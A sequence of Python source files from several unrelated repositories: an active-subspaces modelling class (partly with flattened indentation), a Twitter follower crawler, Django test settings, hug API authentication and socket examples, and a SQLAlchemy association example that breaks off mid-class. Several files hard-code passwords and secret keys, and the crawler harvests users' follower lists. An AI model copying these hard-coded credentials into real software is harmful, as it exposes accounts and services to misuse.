learn a great deal about the simulation from a set of input/output pairs.
Once the model is built and the response surface is trained, one can use
the methods to estimate the average, probabilities, and the minimum of the
simulation quantity of interest as a function of the simulation inputs.
If the model is built from given input/output pairs, then `Rsqr` is the
R-squared coefficient from the response surface on the active variables. If
the model is built from a given interface, the R-squared coefficient is
computed from the output samples computed along with the gradients while
estimating the active subspace. This is a big advantage of building the
response surface with an interface.
"""
# class-level defaults; populated by __init__ and the build_* methods
bounded_inputs = None  # True: inputs in [-1,1]^m with uniform density; False: unbounded, Gaussian density
X, f = None, None  # training inputs (M-by-m) and outputs (M-by-1)
m, n = None, None  # input dimension and active subspace dimension
fun, dfun = None, None  # simulation interface and gradient interface (only set by build_from_interface)
as_respsurf = None  # trained ActiveSubspaceResponseSurface
Rsqr = None  # R-squared coefficient of the trained response surface
def __init__(self, m, bounded_inputs):
    """Describe the simulation's input space for the reduced model.

    :param int m: number of simulation inputs, i.e. the dimension of the
        simulation's parameter space.
    :param bool bounded_inputs: True when the (implicitly shifted and
        scaled) inputs live in the hypercube [-1,1]^m equipped with a
        uniform probability density; False when they are unbounded and
        equipped with a standard Gaussian density.  In the unbounded
        case, correlated inputs are assumed to have been transformed to
        a standard Gaussian beforehand.
    :raises TypeError: when m is not an int or bounded_inputs is not a
        bool.
    """
    if isinstance(m, int):
        self.m = m
    else:
        raise TypeError('m must be an integer.')
    if isinstance(bounded_inputs, bool):
        self.bounded_inputs = bounded_inputs
    else:
        raise TypeError('bounded_inputs must be a boolean.')
def build_from_data(self, X, f, df=None, avdim=None):
"""
Build the active subspace-enabled model with input/output pairs.
:param ndarray X: M-by-m matrix with evaluations of the m-dimensional
simulation inputs.
:param ndarray f: M-by-1 matrix with corresponding simulation quantities
of interest.
:param ndarray df: M-by-m matrix that contains the gradients of the
simulation quantity of interest, oriented row-wise, that correspond
to the rows of `X`. If `df` is not present, then it is estimated
with crude local linear models using the pairs `X` and `f`.
:param int avdim: The dimension of the active subspace. If `avdim`
is not present, a crude heuristic is used to choose an active
subspace dimension based on the given data `X` and
`f`---and possible `df`.
**Notes**
This method follows these steps:
#. If `df` is None, estimate it with local linear models using the \
input/output pairs `X` and `f`.
#. Compute the active and inactive subspaces using `df`.
#. Train a response surface using `X` and `f` that exploits the active \
subspace.
"""
X, f, M, m = process_inputs_outputs(X, f)
# check if the given inputs satisfy the assumptions
if self.bounded_inputs:
if np.any(X) > 1.0 or np.any(X) < -1.0:
raise Exception('The supposedly bounded inputs exceed the \
bounds [-1,1].')
else:
if np.any(X) > 10.0 or np.any(X) < -10.0:
raise Exception('There is a very good chance that your \
unbounded inputs are not properly scaled.')
self.X, self.f, self.m = X, f, m
if df is not None:
df, M_df, m_df = process_inputs(df)
if m_df != m:
raise ValueError('The dimension of the gradients should be \
the same as the dimension of the inputs.')
else:
# if gradients aren't available, estimate them from data
df = local_linear_gradients(X, f)
# compute the active subspace
ss = Subspaces()
ss.compute(df)
if avdim is not None:
if not isinstance(avdim, int):
raise TypeError('avdim should be an integer.')
else:
ss.partition(avdim)
self.n = ss.W1.shape[1]
print 'The dimension of the active subspace is {:d}.'.format(self.n)
# set up the active variable domain and map
if self.bounded_inputs:
avdom = BoundedActiveVariableDomain(ss)
avmap = BoundedActiveVariableMap(avdom)
else:
avdom = UnboundedActiveVariableDomain(ss)
avmap = UnboundedActiveVariableMap(avdom)
# build the response surface
asrs = ActiveSubspaceResponseSurface(avmap)
asrs.train_with_data(X, f)
# set the R-squared coefficient
self.Rsqr = asrs.respsurf.Rsqr
self.as_respsurf = asrs
def build_from_interface(self, fun, dfun=None, avdim=None):
"""
Build the active subspace-enabled model with interfaces to the
simulation.
:param function fun: A function that interfaces with the simulation.
It should take an ndarray of shape 1-by-m (e.g., a row of `X`), and
it should return a scalar. That scalar is the quantity of interest from the simulation.
:param function dfun: A function that interfaces with the simulation.
It should take an ndarray of shape 1-by-m (e.g., a row of `X`), and it
should return the gradient of the quantity of interest as an ndarray of shape 1-by-m.
:param int avdim: The dimension of the active subspace. If `avdim` is not
present, it is chosen after computing the active subspaces using
the given interfaces.
**Notes**
This method follows these steps:
#. Draw random points according to the weight function on the space\
of simulation inputs.
#. Compute the quantity of interest and its gradient at the sampled\
inputs. If `dfun` is None, use finite differences.
#. Use the collection of gradients to estimate the eigenvectors and\
eigenvalues that determine and define the active subspace.
#. Train a response surface using the interface, which uses a careful\
design of experiments on the space of active variables. This design\
uses about 5 points per dimension of the active subspace.
"""
if not hasattr(fun, '__call__'):
raise TypeError('fun should be a callable function.')
if dfun is not None:
if not hasattr(dfun, '__call__'):
raise TypeError('dfun should be a callable function.')
if avdim is not None:
if not isinstance(avdim, int):
raise TypeError('avdim should be an integer')
m = self.m
# number of gradient samples
M = int(np.floor(6*(m+1)*np.log(m)))
# sample points for gradients
if self.bounded_inputs:
X = np.random.uniform(-1.0, 1.0, size=(M, m))
else:
X = np.random.normal(size=(M, m))
fun = SimulationRunner(fun)
f = fun.run(X)
self.X, self.f, self.fun = X, f, fun
# sample the simulation's gradients
if dfun == None:
df = finite_difference_gradients(X, fun)
else:
dfun = SimulationGradientRunner(dfun)
df = dfun.run(X)
self.dfun = dfun
# compute the active subspace
ss = Subspaces()
ss.compute(df)
if avdim is not None:
ss.partition(avdim)
self.n = ss.W1.shape[1]
print 'The dimension of the active subspace is {:d}.'.format(self.n)
# set up the active variable domain and map
if self.bounded_inputs:
avdom = BoundedActiveVariableDomain(ss)
avmap = BoundedActiveVariableMap(avdom)
else:
avdom = UnboundedActiveVariableDomain(ss)
avmap = UnboundedActiveVariableMap(avdom)
# build the response surface
asrs = ActiveSubspaceResponseSurface(avmap)
asrs.train_with_interface(fun, int(np.power(5,self.n)))
# compute testing error as an R-squared
self.Rsqr = 1.0 - ( np.linalg.norm(asrs.predict(X)[0] - f)**2 \
/ np.var(f) )
self.as_respsurf = asrs
def diagnostics(self):
    """Produce the standard suite of active-subspace diagnostic plots.

    Plots, in order: (1) the first 10 eigenvalues with bootstrap ranges
    (look for large gaps on the log scale), (2) bootstrap estimates of
    the subspace errors, (3) the components of the first four
    eigenvectors, which often reveal the important input parameters, and
    (4) 1d/2d sufficient summary plots of the quantity of interest
    against the first two active variables.
    """
    subspaces = self.as_respsurf.avmap.domain.subspaces
    eigenvalues(subspaces.eigenvalues[:10, 0], e_br=subspaces.e_br[:10, :])
    subspace_errors(subspaces.sub_br[:10, :])
    eigenvectors(subspaces.eigenvectors[:, :4])
    # project the training inputs onto the first two active directions
    active_coords = np.dot(self.X, subspaces.eigenvectors[:, :2])
    sufficient_summary(active_coords, self.f)
def predict(self, X, compgrad=False):
    """Evaluate the trained response surface at the given inputs.

    :param ndarray X: M-by-m matrix of points in the simulation's input
        space.
    :param bool compgrad: when True, also compute the response surface
        gradient at each point. (Default is False)
    :return: (f, df) where f holds the response surface values and df the
        estimated gradients; df is None when compgrad is False.
    :raises TypeError: when compgrad is not a bool.
    :raises Exception: when the points' dimension differs from self.m.
    """
    if not isinstance(compgrad, bool):
        raise TypeError('compgrad should be a boolean')
    X, M, m = process_inputs(X)
    if m != self.m:
        raise Exception('The dimension of the points is {:d} but should \
be {:d}.'.format(m, self.m))
    # delegate to the anisotropic RBF + quadratic-monomial surface
    return self.as_respsurf.predict(X, compgrad=compgrad)
def average(self, N):
    """Estimate the average of the simulation output over the input space.

    :param int N: number of function evaluations used by the estimate.
    :return: (mu, lb, ub) -- the estimated average and Monte Carlo-based
        lower/upper bounds.  The bounds only reflect the Monte Carlo
        variance over the inactive variables, not quadrature error.
        When the model was built from data (no simulation interface),
        mu is the average of the response surface and both bounds are
        None.
    :raises TypeError: when N is not an int.
    :raises ValueError: when N < 1.
    """
    if not isinstance(N, int):
        raise TypeError('N should be an integer.')
    if N < 1:
        # FIX: the message previously read "N should positive"
        raise ValueError('N should be positive.')
    if self.fun is not None:
        # interface available: quadrature + Monte Carlo over inactive vars
        mu, lb, ub = integrate(self.fun, self.as_respsurf.avmap, N)
    else:
        # data-only model: integrate the response surface itself
        mu = av_integrate(self.as_respsurf, self.as_respsurf.avmap, N)
        lb, ub = None, None
    return mu, lb, ub
def probability(self, lb, ub, M=10000):
    """Estimate P[lb < f < ub] for the response surface output f.

    :param float lb: lower end of the interval (ints are accepted and cast).
    :param float ub: upper end of the interval (ints are accepted and cast).
    :param int M: number of Monte Carlo samples of the response surface.
    :return: (p, plb, pub) -- the probability estimate and central limit
        theorem-based 99% lower/upper confidence bounds.  The bounds only
        reflect Monte Carlo error, not response surface error.
    :raises TypeError: when lb or ub is neither float nor int.
    """
    if not isinstance(lb, float):
        if isinstance(lb, int):
            lb = float(lb)
        else:
            raise TypeError('lb should be a float')
    if not isinstance(ub, float):
        if isinstance(ub, int):
            ub = float(ub)
        else:
            raise TypeError('ub should be a float')
    # sample the input space according to its density
    if self.bounded_inputs:
        X = np.random.uniform(-1.0, 1.0, size=(M, self.m))
    else:
        X = np.random.normal(size=(M, self.m))
    # NOTE(review): assumes the response surface object is callable and
    # returns an M-by-1 array -- confirm against
    # ActiveSubspaceResponseSurface's interface.
    f = self.as_respsurf(X)
    c = np.all(np.hstack(( f>lb, f<ub )), axis=1)
    p = np.sum(c) / float(M)
    # BUGFIX: the lower and upper 99% bounds were swapped; the lower
    # bound is p minus the CLT half-width, the upper bound is p plus it.
    half_width = 2.58*np.sqrt(p*(1-p)/M)
    plb, pub = p - half_width, p + half_width
    return p, plb, pub
def minimum(self):
    """Heuristically minimize the quantity of interest.

    Searches the simulation input space using the active subspace-enabled
    response surface as a cheap surrogate.  There is no guarantee that
    the result is the true global minimum.

    :return: (fstar, xstar) -- the estimated minimum value and a 1-by-m
        approximate minimizer.
    """
    xstar, fstar = minimize(self.as_respsurf, self.X, self.f)
    return fstar, xstar
| {
"repo_name": "meyersw3476/active_subspaces",
"path": "active_subspaces/base.py",
"copies": "1",
"size": "22339",
"license": "mit",
"hash": -2519192052800470500,
"line_mean": 41.9596153846,
"line_max": 99,
"alpha_frac": 0.6447468553,
"autogenerated": false,
"ratio": 4.4244404832640125,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.003010856668110714,
"num_lines": 520
} |
# A Basic Crawler that retrieves all followers of a user and sends the data to the Service Layer
#
# 12-Aug-2013 12:33 AM ATC Developed using Python 2.7
# ATC = Ali Taylan Cemgil,
# Department of Computer Engineering, Bogazici University
# e-mail : taylan.cemgil@boun.edu.tr
import argparse
from twython import Twython, TwythonError
import requests
from tornado.escape import json_encode
# local
from drenaj.client.config.config import *
from drenaj.utils.drnj_time import *
# Build the service-layer base URL from the environment-specific config.
environment = DRENAJ_APP_ENVIRONMENT
app_root_url = 'http://' + DRENAJ_APP_HOST + ':' + str(DRENAJ_APP_PORT[environment])
# TODO: Direnaj Login
# Create DirenjUser and Password the first time
# These mongodb indices must be defined
# > db.queue.ensureIndex({id: 1}, {unique: true})
# > db.graph.ensureIndex({id: 1})
# THESE TWO collections no more exist. -onurgu
# > db.profiles.ensureIndex({id: 1}, {unique: true})
# > db.users.ensureIndex({id: 1})
# also possible but not needed:
# > db.queue.ensureIndex({id_str: 1}, {unique: true})
#> db.queue.group({key : {id: 1}, cond: {id : {$gt: 221455715}}, reduce: function(curr, result) {result.total += 1}, initial: {total:0}}
# For some reason, the following cannot be obtained from config.py
# NOTE(review): hard-coded service credentials in source -- move these to
# configuration or environment variables.
auth_user_id = 'drenaj'
auth_password = 'tamtam'
# Shared Twitter application credentials and access-token pool.
key_store = KeyStore()
consumer_key = key_store.app_consumer_key
consumer_secret = key_store.app_consumer_secret
def drnj_graph_crawler(fof, root):
    """Fetch all friend/follower IDs of user `root` and post them to the
    Drenaj service layer.

    :param fof: either 'friends' or 'followers' (selects the Twitter endpoint)
    :param root: numeric Twitter user id to crawl
    Returns the service-layer response body, or the TwythonError when the
    initial profile fetch fails.
    """
    # borrow one (access_token_key, access_token_secret) pair from the pool;
    # it is released on every exit path below
    access_tokens = key_store.acquire_access_tokens()
    access_token_key = access_tokens[0][0]
    access_token_secret = access_tokens[0][1]
    twitter = Twython(consumer_key, consumer_secret, access_token_key, access_token_secret)
    # Twitter cursoring starts at -1 (first page)
    cur = -1L
    # The friends/followers IDS to be retrieved will be stored here
    IDS = list()
    #SS = list()
    # Number of calls to the twitter API
    remain = 0
    # True if data is fetched correctly
    success = True
    # Seconds to wait before trying again twitter limit
    wait = 120
    print "Retrieving the recent profile of user %d\n" % root
    # First, try to get the recent profile settings of the user
    try:
        v = twitter.get('users/show', {"user_id": root})
        print v['screen_name'], v['name'], json_encode(v)
        post_data = {"user_id": json_encode([root]), "v": json_encode([v]), "auth_user_id": auth_user_id, "auth_password": auth_password}
        print post_data
        post_response = requests.post(url=app_root_url + '/profiles/store', data=post_data)
        # post_response = requests.post(url=app_root_url + '/user/store', data={"user_id": root, "v": v})
    except TwythonError as e:
        print e
        print "Error while fetching user profile from twitter, quitting ..."
        key_store.release_access_tokens(access_tokens)
        return e
    if v['protected']:
        # protected accounts cannot be crawled; tell the scheduler and stop
        post_data = {"user_id": root, "isProtected": 1, "auth_user_id": auth_user_id, "auth_password": auth_password}
        post_response = requests.post(url=app_root_url+'/scheduler/reportProtectedUserid', data=post_data)
        print "Reported User %d as having a Protected Account" % root
        key_store.release_access_tokens(access_tokens)
    else:
        print "Retrieving %s of user %d\n" % (fof, root)
        # page through the friends/followers ids endpoint until the
        # cursor returns 0 (no more pages) or an API error occurs
        while 1:
            # Check if we still have some bandwidth available
            while remain<=0:
                v = twitter.get('application/rate_limit_status', {"resources": fof})
                remain = v["resources"][fof]["/" + fof + "/ids"]["remaining"]
                if remain>0:
                    break
                print "Waiting... Twitter API rate limit reached\n"
                time.sleep(wait)
            try:
                S = twitter.get(fof + '/ids', {'user_id': root, 'cursor': cur})
                # We count the number of remaining requests to the Twitter API
                remain = remain - 1
                IDS = IDS + S["ids"]
                # SS = SS.append(S)
                print "Total number of %s ID's retrieved so far: %d" % (fof, len(IDS))
                cur = S["next_cursor"]
                if cur==0:
                    break
            except TwythonError as e:
                print e
                success = False
                print "Error while fetching data from Twitter API"
                break
        key_store.release_access_tokens(access_tokens)
        print "IDS retrieved: "
        print IDS
        if success:
            # hand the collected ids over to the service layer
            post_data = {"user_id": root, "ids": json_encode(IDS),"auth_user_id":auth_user_id, "auth_password": auth_password}
            post_response = requests.post(url=app_root_url + '/' + fof + '/ids/store', data=post_data)
            print "%s" % post_response.content
            return post_response.content
        else:
            # NOTE(review): this branch runs after ANY Twitter API error,
            # not only for protected accounts -- reporting "protected"
            # here may mislabel users; confirm the intent.
            post_data = {"user_id": root, "isProtected": 1, "auth_user_id":auth_user_id, "auth_password": auth_password}
            post_response = requests.post(url=app_root_url+'/scheduler/reportProtectedUserid', data=post_data)
            print "Reported User as having a Protected Account %d" % root
            return post_response.content
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Direnaj Friends/Followers Crawler')
    parser.add_argument('-f', '--fof', choices=["friends", "followers"], help='("friends"|"followers")', default="followers")
    parser.add_argument('-u', '--user_id', help='the user id', type=int, default=0)
    parser.add_argument('-N', '--iteration', help='number of requests', type=int, default=1)
    args = parser.parse_args()
    fof = args.fof
    root = int(args.user_id)
    N = int(args.iteration)
    # With no explicit user id, poll the scheduler N times for suggested
    # ids; fall back to a hard-coded test account when it returns 0.
    if root==0:
        for i in range(N):
            print i
            # Get from scheduler
            get_response = requests.get(url=app_root_url+'/scheduler/suggestUseridToGet_' + fof)
            root = int(get_response.content)
            if root==0:
                #root = 50354388; # koray
                root = 461494325; # Taylan
                #root = 505670972; # Cem Say
                #root = 483121138; # meltem
                #root = 230412751; # Cengiz
                #root = 636874348; # Pinar Selek
                #root = 382081201; # Tolga Tuzun
                #root = 745174243; # Sarp Maden
            drnj_graph_crawler(fof, root)
    else:
        # an explicit user id means a single crawl; N is not used
        print "Ignoring N"
        drnj_graph_crawler(fof, root)
| {
"repo_name": "boun-cmpe-soslab/drenaj",
"path": "drenaj/client/workers/twitter_api_getfollowers.py",
"copies": "1",
"size": "6376",
"license": "mit",
"hash": -8799007569239333000,
"line_mean": 35.8554913295,
"line_max": 137,
"alpha_frac": 0.6046110414,
"autogenerated": false,
"ratio": 3.491785323110624,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4596396364510624,
"avg_score": null,
"num_lines": null
} |
"""A basic database set-up for Travis CI.
The set-up uses the 'TRAVIS' (== True) environment variable on Travis
to detect the session, and changes the default database accordingly.
Be mindful of where you place this code, as you may accidentally
assign the default database to another configuration later in your code.
"""
import os

# Shared connection settings; only the database name and credentials
# differ between Travis CI and local development.
_BASE_DB = {
    'ENGINE': 'django.db.backends.postgresql_psycopg2',
    'HOST': 'localhost',
    'PORT': '',
}

if 'TRAVIS' in os.environ:
    # Travis CI provides a passwordless 'postgres' superuser.
    _credentials = {'NAME': 'travis_ci_test', 'USER': 'postgres', 'PASSWORD': ''}
else:
    _credentials = {'NAME': 'develop', 'USER': 'develop', 'PASSWORD': 'develop'}

DATABASES = {'default': dict(_BASE_DB, **_credentials)}

SECRET_KEY = 'qwerty?'

INSTALLED_APPS = (
    'amqp_2phase',
    'tests',
)
# Initialize Django's app registry so the apps in INSTALLED_APPS can be
# imported when this settings module is loaded directly (e.g. by pytest).
import django
django.setup()
"repo_name": "cloud-taxi/django-amqp-2phase",
"path": "tests/settings.py",
"copies": "1",
"size": "1061",
"license": "bsd-3-clause",
"hash": 3188259280762269000,
"line_mean": 23.1363636364,
"line_max": 72,
"alpha_frac": 0.5353440151,
"autogenerated": false,
"ratio": 3.789285714285714,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4824629729385714,
"avg_score": null,
"num_lines": null
} |
"""A basic example of authentication requests within a hug API"""
import hug
import jwt

# Several authenticators are included in hug/authentication.py. These functions
# accept a verify_user function, which can be either an included function (such
# as the basic username/password function demonstrated below), or logic of your
# own. Verification functions return an object to store in the request context
# on successful authentication. Naturally, this is a trivial demo, and a much
# more robust verification function is recommended. This is for strictly
# illustrative purposes.
# NOTE: the credentials below are hard-coded for this demo only.
authentication = hug.authentication.basic(hug.authentication.verify("User1", "mypassword"))
@hug.get("/public")
def public_api_call():
    """An endpoint anyone may call; no credentials required."""
    return "Needs no authentication"
# Note that the logged in user can be accessed via a built-in directive.
# Directives can provide computed input parameters via an abstraction
# layer so as not to clutter your API functions with access to the raw
# request object.
@hug.get("/authenticated", requires=authentication)
def basic_auth_api_call(user: hug.directives.user):
    """Echo the authenticated user injected by hug's user directive."""
    message = "Successfully authenticated with user: {0}"
    return message.format(user)
# Here is a slightly less trivial example of how authentication might
# look in an API that uses keys.
# First, the user object stored in the context need not be a string,
# but can be any Python object.
class APIUser(object):
    """A minimal example of a rich User object"""

    def __init__(self, user_id, api_key):
        self.user_id = user_id
        self.api_key = api_key

    def __repr__(self):
        # Deliberately omit the api_key so credentials never leak into
        # logs or tracebacks.
        return "APIUser(user_id={0!r})".format(self.user_id)
def api_key_verify(api_key):
    """Resolve an API key to an APIUser, or None for an unknown key."""
    magic_key = "5F00832B-DE24-4CAF-9638-C10D1C642C6C"  # Obviously, this would hit your database
    if api_key != magic_key:
        # Invalid key
        return None
    # Success!
    return APIUser("user_foo", api_key)
api_key_authentication = hug.authentication.api_key(api_key_verify)


# The `user` directive receives whatever api_key_verify returned (an
# APIUser), so its attributes are available to the handler.
@hug.get("/key_authenticated", requires=api_key_authentication)  # noqa
def basic_auth_api_call(user: hug.directives.user):
    return "Successfully authenticated with user: {0}".format(user.user_id)
def token_verify(token):
    """Decode a JWT; return its payload dict, or False when decoding fails."""
    secret_key = "super-secret-key-please-change"
    try:
        # BUGFIX: PyJWT's decode() expects `algorithms` (a list of allowed
        # algorithms); the singular `algorithm` keyword was silently
        # ignored by old releases and is rejected by PyJWT >= 2.0.
        return jwt.decode(token, secret_key, algorithms=["HS256"])
    except jwt.DecodeError:
        return False
token_key_authentication = hug.authentication.token(token_verify)


# `user` here is the decoded JWT payload dict returned by token_verify.
@hug.get("/token_authenticated", requires=token_key_authentication)  # noqa
def token_auth_call(user: hug.directives.user):
    return "You are user: {0} with data {1}".format(user["user"], user["data"])
@hug.post("/token_generation")  # noqa
def token_gen_call(username, password):
    """Validate the mock credentials and return a signed JWT on success."""
    secret_key = "super-secret-key-please-change"
    mockusername = "User2"
    mockpassword = "Mypassword"
    if username == mockusername and password == mockpassword:  # This is an example. Don't do that.
        payload = {"user": username, "data": "mydata"}
        return {"token": jwt.encode(payload, secret_key, algorithm="HS256")}
    return "Invalid username and/or password for user: {0}".format(username)
| {
"repo_name": "timothycrosley/hug",
"path": "examples/authentication.py",
"copies": "1",
"size": "3104",
"license": "mit",
"hash": 7195108274195020000,
"line_mean": 35.0930232558,
"line_max": 100,
"alpha_frac": 0.7152061856,
"autogenerated": false,
"ratio": 3.656065959952886,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4871272145552886,
"avg_score": null,
"num_lines": null
} |
'''A basic example of authentication requests within a hug API'''
import hug
import jwt

# Several authenticators are included in hug/authentication.py. These functions
# accept a verify_user function, which can be either an included function (such
# as the basic username/password function demonstrated below), or logic of your
# own. Verification functions return an object to store in the request context
# on successful authentication. Naturally, this is a trivial demo, and a much
# more robust verification function is recommended. This is for strictly
# illustrative purposes.
# NOTE: the credentials below are hard-coded for this demo only.
authentication = hug.authentication.basic(hug.authentication.verify('User1', 'mypassword'))
@hug.get('/public')
def public_api_call():
    '''Open endpoint that requires no credentials.'''
    return "Needs no authentication"
# Note that the logged in user can be accessed via a built-in directive.
# Directives can provide computed input parameters via an abstraction
# layer so as not to clutter your API functions with access to the raw
# request object.
@hug.get('/authenticated', requires=authentication)
def basic_auth_api_call(user: hug.directives.user):
    '''Report the user object that hug's user directive injected.'''
    template = 'Successfully authenticated with user: {0}'
    return template.format(user)
# Here is a slightly less trivial example of how authentication might
# look in an API that uses keys.
# First, the user object stored in the context need not be a string,
# but can be any Python object.
class APIUser(object):
    """A minimal example of a rich User object"""

    def __init__(self, user_id, api_key):
        self.user_id = user_id
        self.api_key = api_key

    def __repr__(self):
        # Deliberately omit the api_key so credentials never leak into
        # logs or tracebacks.
        return 'APIUser(user_id={0!r})'.format(self.user_id)
def api_key_verify(api_key):
    '''Look up an API key; return an APIUser on success, else None.'''
    magic_key = '5F00832B-DE24-4CAF-9638-C10D1C642C6C'  # Obviously, this would hit your database
    if api_key != magic_key:
        # Invalid key
        return None
    # Success!
    return APIUser('user_foo', api_key)
api_key_authentication = hug.authentication.api_key(api_key_verify)


# The `user` directive receives whatever api_key_verify returned (an
# APIUser), so its attributes are available to the handler.
@hug.get('/key_authenticated', requires=api_key_authentication)  # noqa
def basic_auth_api_call(user: hug.directives.user):
    return 'Successfully authenticated with user: {0}'.format(user.user_id)
def token_verify(token):
    """Validate a JWT and return its decoded payload, or False if invalid."""
    secret_key = 'super-secret-key-please-change'
    try:
        # PyJWT's decode() takes ``algorithms`` -- a whitelist of accepted
        # algorithms. The singular ``algorithm=`` keyword used previously is
        # silently ignored by old PyJWT releases and rejected by current ones,
        # which would disable signature-algorithm pinning.
        return jwt.decode(token, secret_key, algorithms=['HS256'])
    except jwt.DecodeError:
        return False
token_key_authentication = hug.authentication.token(token_verify)
@hug.get('/token_authenticated', requires=token_key_authentication)  # noqa
def token_auth_call(user: hug.directives.user):
    """Echo the JWT payload of the token-authenticated user."""
    payload_user = user['user']
    payload_data = user['data']
    return 'You are user: {0} with data {1}'.format(payload_user, payload_data)
@hug.post('/token_generation')  # noqa
def token_gen_call(username, password):
    """Authenticate and return a token.

    Returns a dict with a signed JWT on success, or an error string on
    failure. This is an example: real code would hash passwords and query
    a user store instead of comparing against hard-coded values.
    """
    import hmac  # local import: constant-time comparison for credentials
    secret_key = 'super-secret-key-please-change'
    mockusername = 'User2'
    mockpassword = 'Mypassword'
    # Compare credentials in constant time to avoid leaking information
    # through timing side-channels (str() guards against non-string input).
    password_ok = hmac.compare_digest(str(password).encode(), mockpassword.encode())
    username_ok = hmac.compare_digest(str(username).encode(), mockusername.encode())
    if password_ok and username_ok:
        return {"token": jwt.encode({'user': username, 'data': 'mydata'}, secret_key, algorithm='HS256')}
    return 'Invalid username and/or password for user: {0}'.format(username)
| {
"repo_name": "MuhammadAlkarouri/hug",
"path": "examples/authentication.py",
"copies": "1",
"size": "3082",
"license": "mit",
"hash": -7835600686454642000,
"line_mean": 35.6904761905,
"line_max": 106,
"alpha_frac": 0.720311486,
"autogenerated": false,
"ratio": 3.6473372781065088,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48676487641065086,
"avg_score": null,
"num_lines": null
} |
"""A basic example of using hug.use.Socket to return data from raw sockets"""
import hug
import socket
import struct
import time
http_socket = hug.use.Socket(connect_to=('www.google.com', 80), proto='tcp', pool=4, timeout=10.0)
ntp_service = hug.use.Socket(connect_to=('127.0.0.1', 123), proto='udp', pool=4, timeout=10.0)
EPOCH_START = 2208988800
@hug.get()
def get_time():
    """Get time from a locally running NTP server"""
    # 48-byte NTP packet; the first byte 0x1b encodes LI=0, version 3, mode 3
    # (client request), the rest is zero padding.
    # NOTE(review): this is a str, not bytes -- confirm hug's Socket layer
    # encodes it before writing to the UDP socket.
    time_request = '\x1b' + 47 * '\0'
    # The 48-byte reply is unpacked as 12 big-endian uint32s; word 10 is the
    # transmit-timestamp seconds field, counted from the NTP epoch (1900).
    now = struct.unpack("!12I", ntp_service.request(time_request, timeout=5.0).data.read())[10]
    return time.ctime(now - EPOCH_START)
@hug.get()
def reverse_http_proxy(length: int=100):
    """Simple reverse http proxy function that returns data/html from another http server (via sockets)
    only drawback is the peername is static, and currently does not support being changed.
    Example: curl localhost:8000/reverse_http_proxy?length=400"""
    # NOTE(review): the request below carries extra indentation, blank lines
    # and doubled CRLFs; lenient servers (e.g. google.com) accept it, but a
    # strict HTTP server may not -- verify before reusing.
    http_request = """
    GET / HTTP/1.0\r\n\r\n
    Host: www.google.com\r\n\r\n
    \r\n\r\n
    """
    # Return only the first *length* bytes of the raw response (headers + body).
    return http_socket.request(http_request, timeout=5.0).data.read()[0:length]
| {
"repo_name": "MuhammadAlkarouri/hug",
"path": "examples/use_socket.py",
"copies": "1",
"size": "1092",
"license": "mit",
"hash": -7666298879065699000,
"line_mean": 32.0909090909,
"line_max": 103,
"alpha_frac": 0.6923076923,
"autogenerated": false,
"ratio": 2.9917808219178084,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4184088514217808,
"avg_score": null,
"num_lines": null
} |
"""A basic example of using hug.use.Socket to return data from raw sockets"""
import hug
import socket
import struct
import time
http_socket = hug.use.Socket(connect_to=("www.google.com", 80), proto="tcp", pool=4, timeout=10.0)
ntp_service = hug.use.Socket(connect_to=("127.0.0.1", 123), proto="udp", pool=4, timeout=10.0)
EPOCH_START = 2208988800
@hug.get()
def get_time():
    """Return the local NTP server's current time as a ctime string."""
    # Mode-3 (client) request: lead byte 0x1b, zero-padded to 48 bytes.
    request_packet = "\x1b" + 47 * "\0"
    reply = ntp_service.request(request_packet, timeout=5.0).data.read()
    # Twelve big-endian uint32 words; word 10 holds the transmit-timestamp
    # seconds, counted from the NTP epoch (1900-01-01).
    words = struct.unpack("!12I", reply)
    return time.ctime(words[10] - EPOCH_START)
@hug.get()
def reverse_http_proxy(length: int = 100):
    """Return the first *length* bytes served by the proxied HTTP origin.

    The peer (www.google.com) is fixed at module load and cannot currently
    be changed. Example: curl localhost:8000/reverse_http_proxy?length=400
    """
    raw_request = """
    GET / HTTP/1.0\r\n\r\n
    Host: www.google.com\r\n\r\n
    \r\n\r\n
    """
    response = http_socket.request(raw_request, timeout=5.0)
    return response.data.read()[:length]
| {
"repo_name": "timothycrosley/hug",
"path": "examples/use_socket.py",
"copies": "1",
"size": "1096",
"license": "mit",
"hash": -845939506402359700,
"line_mean": 30.3142857143,
"line_max": 103,
"alpha_frac": 0.6897810219,
"autogenerated": false,
"ratio": 2.9945355191256833,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.41843165410256833,
"avg_score": null,
"num_lines": null
} |
"""A basic example of using the association object pattern.
The association object pattern is a form of many-to-many which
associates additional data with each association between parent/child.
The example illustrates an "order", referencing a collection
of "items", with a particular price paid associated with each "item".
"""
from datetime import datetime
from sqlalchemy import (create_engine, MetaData, Table, Column, Integer,
String, DateTime, Float, ForeignKey, and_)
from sqlalchemy.orm import mapper, relationship, Session
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Order(Base):
    """An order placed by a customer, holding OrderItem line items."""
    __tablename__ = 'order'

    order_id = Column(Integer, primary_key=True)
    customer_name = Column(String(30), nullable=False)
    # Pass the callable itself, not its result: ``default=datetime.now()``
    # would be evaluated once at class-definition time, stamping every order
    # with the module import time instead of the actual insertion time.
    order_date = Column(DateTime, nullable=False, default=datetime.now)
    order_items = relationship("OrderItem", cascade="all, delete-orphan",
                               backref='order')

    def __init__(self, customer_name):
        self.customer_name = customer_name
class Item(Base):
    """A catalog item with a description and a list price."""
    __tablename__ = 'item'

    item_id = Column(Integer, primary_key=True)
    description = Column(String(30), nullable=False)
    price = Column(Float, nullable=False)

    def __init__(self, description, price):
        self.description = description
        self.price = price

    def __repr__(self):
        # %r delegates to repr(), so output matches the original format.
        return 'Item(%r, %r)' % (self.description, self.price)
class OrderItem(Base):
    """Association object linking an Order to an Item, recording the price
    actually paid for that item in that order."""
    __tablename__ = 'orderitem'

    order_id = Column(Integer, ForeignKey('order.order_id'), primary_key=True)
    item_id = Column(Integer, ForeignKey('item.item_id'), primary_key=True)
    price = Column(Float, nullable=False)

    def __init__(self, item, price=None):
        self.item = item
